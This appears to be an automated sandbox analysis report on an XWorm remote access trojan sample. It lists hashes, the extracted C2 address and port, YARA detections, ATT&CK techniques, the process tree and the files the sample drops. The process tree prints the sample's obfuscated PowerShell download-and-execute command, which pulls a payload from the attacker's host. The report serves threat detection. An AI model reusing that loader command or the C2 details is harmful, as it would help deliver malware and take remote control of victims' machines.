xworm | 2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a

General

Target

185.7.214_1.211.cmd
Size

172B
MD5

e3f9c42a3eee3a73f89685a8c2cc027e
SHA1

9d934754caf36aeb28f239f0011bedc4f68138f5
SHA256

2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
SHA512

51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.211/a.mp4

Extracted

Family

xworm

Version

5.0

C2

185.7.214.211:4444

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e0fe-25.dat	family_xworm
behavioral2/memory/5116-26-0x0000016B59670000-0x0000016B59680000-memory.dmp	family_xworm
behavioral2/memory/2908-28-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	5116	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5116	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5116 set thread context of 2908	5116	powershell.exe	92

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5116	powershell.exe
5116	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	2908	MSBuild.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4996 wrote to memory of 5116	4996	cmd.exe	86
PID 4996 wrote to memory of 5116	4996	cmd.exe	86
PID 5116 wrote to memory of 4104	5116	powershell.exe	90
PID 5116 wrote to memory of 4104	5116	powershell.exe	90
PID 4104 wrote to memory of 3296	4104	csc.exe	91
PID 4104 wrote to memory of 3296	4104	csc.exe	91
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92
PID 5116 wrote to memory of 2908	5116	powershell.exe	92

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4104
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7985.tmp" "c:\Users\Admin\AppData\Local\Temp\dha3b2ei\CSCE1BE0E28F29143E58B3DFAC3C0861E82.TMP"
      4⤵
      PID:3296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7985.tmp

Filesize
1KB

MD5
0468e06767ce903a637918645930423f

SHA1
7428b6388bd8d6ddbd461576996a8caad56f65c6

SHA256
25ec1b3e1474e8f4dfd7ecebee660830bb161f399ad94b125a8449ec02e6bc4f

SHA512
45a535e2cef504d483180c74fab2b3d1a2a96156aa89c848f6141cd5beddb85b2b9af13c91007db1964b54bb820dc4f8d13a7f127267ca71848ef58405c46dc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rg4dwk2q.4l2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.dll

Filesize
41KB

MD5
24fc7ad127458e15e52292cf03cc94d6

SHA1
25cff545e88d395043901e3717cd86cc636dbb90

SHA256
b83bf9426da3d8be783d48a92606d3894ba5a2c3e28a3a59b6ba762657294fb9

SHA512
2620464495ea06a1cbb18689660a39406e34f6aad013123c764d69476361fe71a57e1ed7800568b8ef8f293d752bd27357ff72bcc363aa4fffc4d9b3101377d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dha3b2ei\CSCE1BE0E28F29143E58B3DFAC3C0861E82.TMP

Filesize
652B

MD5
395436c325fbdc18b9b3ee672271ddf9

SHA1
697f1a75d8d57fcda9abdf5ff83db13bc24a6f92

SHA256
ac0508df16a481c6c6b223fb9a7dd396e26ddc77cba0b082bb62a80da385d7da

SHA512
96ef52d8078b7ed28811785794e7e76a142e78ced8c19dd95dfe460f04c00fcc7bdbf1598dca3b9e1eef6c249d5bf763aceb13c2b7ed3622c96ef664f3625691

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.0.cs

Filesize
101KB

MD5
cba2847534e58636a5292dc393b45fdd

SHA1
ffd2fc63507cfee641ba53038d3f017a6ededbee

SHA256
33561d11060d90e7a1d49d19e395fd943c2500af98521412d2390b43b6cec6bd

SHA512
1b9bd2957ffe364788abcca1d90f2deb4634c89eea0a07e6a203573ed606df95b3e28ce41de038badaef674b2a8606fb8370abb3d9697b45f80f82d5e89ec1d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.cmdline

Filesize
204B

MD5
5173d3aedc878e8538351a90f4da5569

SHA1
b75fcb53c2c11238b3f4af54e69ec8e33ce1c574

SHA256
92bf618864046e4bc7e604ef1afac0aac5debbdf95100490a759d76fe5b14f83

SHA512
43ec2bed3964afa03f63c7a319c1b23098cebd269f28a7eac2a536b801365db552995dbf3716c633b04882812638435a0efa1cafdfadf9f7375e1435dadc9bb6

Download Submit
memory/2908-33-0x0000000005620000-0x00000000056BC000-memory.dmp

Filesize
624KB

Download
memory/2908-32-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

Filesize
4KB

Download
memory/2908-37-0x0000000006CC0000-0x0000000007264000-memory.dmp

Filesize
5.6MB

Download
memory/2908-36-0x0000000006670000-0x0000000006702000-memory.dmp

Filesize
584KB

Download
memory/2908-35-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/2908-34-0x0000000074C9E000-0x0000000074C9F000-memory.dmp

Filesize
4KB

Download
memory/2908-28-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5116-1-0x0000016B59680000-0x0000016B596A2000-memory.dmp

Filesize
136KB

Download
memory/5116-31-0x00007FFD877A0000-0x00007FFD88261000-memory.dmp

Filesize
10.8MB

Download
memory/5116-0-0x00007FFD877A3000-0x00007FFD877A5000-memory.dmp

Filesize
8KB

Download
memory/5116-26-0x0000016B59670000-0x0000016B59680000-memory.dmp

Filesize
64KB

Download
memory/5116-13-0x0000016B71900000-0x0000016B71954000-memory.dmp

Filesize
336KB

Download
memory/5116-11-0x00007FFD877A0000-0x00007FFD88261000-memory.dmp

Filesize
10.8MB

Download
memory/5116-12-0x00007FFD877A0000-0x00007FFD88261000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads